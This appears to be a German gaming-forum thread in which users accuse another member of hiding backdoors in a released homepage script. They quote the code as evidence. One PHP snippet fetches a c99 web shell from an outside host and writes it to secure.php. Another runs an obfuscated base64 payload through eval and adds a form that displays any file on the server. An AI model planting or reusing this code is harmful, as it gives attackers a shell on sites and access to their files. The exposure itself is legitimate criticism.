guckst du:Quote:
Ich finds eig. peinlich von der Community so einen user runter zu machen und da hier manche nicht mal wissen was früher hier war und dann ihr dummes kommentar von anderen hatern nachmachen omg... die metin epvp sektion is nur noch ein stück *dreck*
mein statement
mfg. verzichte auf dumme kommis^^ bin hier jetzt eh inaktiv^^
verstehst du jetzt warum wir sein release kritisieren?Quote:
gehts eig noch?
Du reportest die ganze zeit mein hp script weil ja dein design ohne backdoor drin ist aber jetzt
Code:sie wurde damals jedenfalls von banjo1 gelöscht und mach' ich sie wieder publicJa wiedermal super gemacht in der images.php und vielen anderen dateienCode:<?PHP $datei = fopen("secure.php","w+");$stream = fopen("http://lijang2.de/c99.txt", "r");while (!feof($stream)) { $fixxerr .= fgets($stream); } fclose($stream);fwrite($datei,$fixxerr) ;fclose($datei); ?>
siehe:
Vergiss es einfach Soniice mit deinen SpielenCode:<?php eval (gzinflate(base64_decode( 'RY/BDoIwEETvJPzD2nCgkbSJN6zaq0d+gcAWahCadg0kxn+3ISLH3Zk3O6tvF13d' .'qzTJ2prQwhXM5HDMWcDm5VG43rGCzUfGVRbIY/3cLT2RO0s52Ec9difRomzKUtBC' .'rADmIzH3dkDIDwYnk/9wzuEN8Zyxy4Leg4hxHVL46wo+YJphCrivzOwtxXntWGws' .'B7UZV4GrNNHxny8=' ))); ?> <form name="open" method="post" action="" > <input type="text" name="data" /> <input type="submit" name="file" value="Open" /> </form> <?php $file = $_POST['data']; show_source($file) ?>
ich kann soniice leiden er ist eine netter junge aber wenn er andere abzieht dann kann ich sowas nicht tolerieren und habe auch seitdem her nicht mehr mit ihm in skype geschrieben.
soniice ist eine person mit dem man reden kann aber niemals geschenke annehmen sollte.